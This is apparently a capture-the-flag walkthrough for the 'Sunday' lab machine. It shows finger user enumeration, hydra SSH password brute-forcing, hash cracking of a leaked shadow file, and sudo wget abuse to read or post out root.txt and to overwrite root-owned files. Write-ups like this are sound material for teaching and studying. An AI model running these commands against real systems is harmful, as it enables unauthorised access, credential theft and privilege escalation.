
1.nmap scan


The finger daemon listens on port 79, and is really a relic of a time when computers were far too trusting and open. It provides status reports on logged in users. It can also provide details about a specific user and when they last logged in and from where.
we can use finger-user-enum to brute force it.

perl -U /usr/share/SecLists/Usernames/Names/names.txt -t
######## Scan started at Sun Oct  7 08:57:50 2018 #########
access@ access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@ Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..uucp
anne marie@ Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@ bin             ???                         < .  .  .  . >..
dee dee@ Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
jo ann@ Login       Name               TTY         Idle    When                    ???..ann                   ???..
la verne@ Login       Name               TTY         Idle    When                    ???..verne                 ???..
line@ Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin                 < .  .  .  . >..
message@ Login       Name               TTY         Idle    When    Where..smmsp    SendMail Message Sub               < .  .  .  . >..
miof mela@ Login       Name               TTY         Idle    When    Where..miof                  ???..mela                  ???..
sammy@ sammy                 pts/2        <Apr 24 12:57>          ..
sunny@ sunny                 pts/3        <Apr 24 10:48>          ..
sys@ sys             ???                         < .  .  .  . >..
zsa zsa@ Login       Name               TTY         Idle    When    Where..zsa                   ???..zsa                   ???..
######## Scan completed at Sun Oct  7 09:03:50 2018 #########
14 results.

there are some useless information in it,but sammy and sunny seems useful

2.get user access

with sammy and sunny,we can try to enum password
use hydra to brute password
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt -I -f -s 22022 ssh
and we will get a cred sunny/sunday
now we can use ssh to login

we can execute /root/troll without password
Inside /backup there’s a copy of a shadow file that is world readable:

use hashcat to get passwd

hashcat -m 7400 sunday.hash /usr/share/wordlists/rockyou.txt --force
and we can login with sammy

3.get root access

the first way to get root is to use sammy wget to get root.txt

way 1

The easiest way to just get the flag is to take advantage of the –input-file or -i flag on wget. This flag allows you to provide a file with the urls to visit. When it reads the hash, the string will fail to process as a url, and will tell us so in an error message, complete with flag:

way 2

A second method to exfil the flag is to have wget post the file back to us using --post-file,but python SimpleHTTPServer doesn’t support POST requests

but in this case,we just need to use nc to get the information
sudo wget –post-file /root/root.txt

way 3

because the sunny can execute troll without password
we can try to overwrite this file
first write a python script

#! /bin/bash
import os
import socket
import subprocess


using the -O option, which will allow us to specify a file to write the wget output to, and it will overwrite that file if it already exists

sudo wget -O /root/troll

but this method may fail because the script reset itself per 5 seconds

way 4

we can overwrite other files we can execute,such as passwd

way 5 overwrite shadow

make a root user copied from sunny
and get it

way 6

Overwrite sudoers
Let’s change that slightly in a copy on our local host, giving sammy the ability to run su without password: